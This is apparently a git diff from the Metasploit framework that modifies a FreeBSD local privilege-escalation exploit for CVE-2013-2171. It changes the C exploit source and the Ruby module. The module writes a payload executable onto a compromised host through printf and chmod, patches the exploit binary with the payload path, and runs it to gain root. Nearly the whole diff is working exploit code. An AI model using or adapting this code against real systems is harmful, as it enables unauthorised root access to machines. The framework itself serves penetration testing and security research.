diff --git a/data/exploits/CVE-2013-2171.bin b/data/exploits/CVE-2013-2171.bin
index 24177a2581..8ed0677c17 100755
Binary files a/data/exploits/CVE-2013-2171.bin and b/data/exploits/CVE-2013-2171.bin differ
diff --git a/external/source/exploits/CVE-2013-2171/exploit.c b/external/source/exploits/CVE-2013-2171/exploit.c
index b4c027a39b..0ee635d5d9 100644
--- a/external/source/exploits/CVE-2013-2171/exploit.c
+++ b/external/source/exploits/CVE-2013-2171/exploit.c
@@ -17,7 +17,7 @@ int main(int ac, char **av) {
    struct ptrace_io_desc piod;
    char *s, *d;
    int pid;
-   char *bin = "/tmp/W00T";  // "W00T" is just a place holder
+   char *bin = "MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890";  // is just a place holder
 
    if (geteuid() == 0)  {
         setuid(0);
diff --git a/modules/exploits/freebsd/local/mmap.rb b/modules/exploits/freebsd/local/mmap.rb
index 095254b56f..d0c2858a36 100644
--- a/modules/exploits/freebsd/local/mmap.rb
+++ b/modules/exploits/freebsd/local/mmap.rb
@@ -12,6 +12,7 @@ class Metasploit4 < Msf::Exploit::Local
 
 	include Msf::Exploit::EXE
 	include Msf::Post::Common
+	include Msf::Post::File
 	include Msf::Exploit::FileDropper
 
 	def initialize(info={})
@@ -49,6 +50,11 @@ class Metasploit4 < Msf::Exploit::Local
 				'DisclosureDate' => "Jun 18 2013",
 			}
 		))
+		register_options([
+			# It isn't OptPath becuase it's a *remote* path
+			OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
+		], self.class)
+
 	end
 
 	def check
@@ -58,7 +64,7 @@ class Metasploit4 < Msf::Exploit::Local
 		Exploit::CheckCode::Safe
 	end
 
-	def write_file(data, fname)
+	def write_file(fname, data)
 		oct_data = "\\" + data.unpack("C*").collect {|e| e.to_s(8)} * "\\"
 		session.shell_command_token("printf \"#{oct_data}\" > #{fname}")
 		session.shell_command_token("chmod +x #{fname}")
@@ -67,10 +73,17 @@ class Metasploit4 < Msf::Exploit::Local
 		return (chk =~ /ERROR: cannot open/) ? false : true
 	end
 
+
 	def upload_payload
-		fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}"
+		fname = datastore['WritableDir']
+		fname = "#{fname}/" unless fname =~ %r'/$'
+		if fname.length > 36
+			fail_with(Exploit::Failure::BadConfig, "WritableDir can't be longer than 33 characters")
+		end
+		fname = "#{fname}#{Rex::Text.rand_text_alpha(4)}"
+
 		p = generate_payload_exe
-		f = write_file(p, fname)
+		f = write_file(fname, p)
 		return nil if not f
 		fname
 	end
@@ -80,17 +93,14 @@ class Metasploit4 < Msf::Exploit::Local
 		# Metasm does not support FreeBSD executable generation.
 		#
 		path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2171.bin")
-		f    = File.open(path, 'rb')
-		x    = f.read(f.stat.size)
-		f.close
-
-		x.gsub(/W00T/, File.basename(payload_fname))
+		x = File.open(path, 'rb') { |f| f.read(f.stat.size) }
+		x.gsub(/MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/, payload_fname.ljust(40, "\x00"))
 	end
 
 	def upload_exploit(payload_fname)
-		fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
+		fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}"
 		bin = generate_exploit(payload_fname)
-		f = write_file(bin, fname)
+		f = write_file(fname, bin)
 		return nil if not f
 		fname
 	end